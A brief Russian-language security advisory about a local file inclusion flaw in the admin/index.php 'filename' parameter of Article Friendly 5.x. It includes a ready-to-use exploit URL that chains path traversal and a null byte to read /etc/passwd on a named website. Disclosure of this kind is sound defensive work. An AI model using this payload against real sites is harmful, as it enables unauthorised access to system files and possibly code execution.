Программа: Article Friendly 5.x

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре "filename" сценарием admin/index.php. Удаленный
пользователь может выполнить произвольный PHP сценарий на целевой системе с
привилегиями Web сервера.

Эксплоит:

http://www.familyfriendsphotos.com/admin/index.php?filename=../../../../../../../../../../etc/passwd%00



Оставить мнение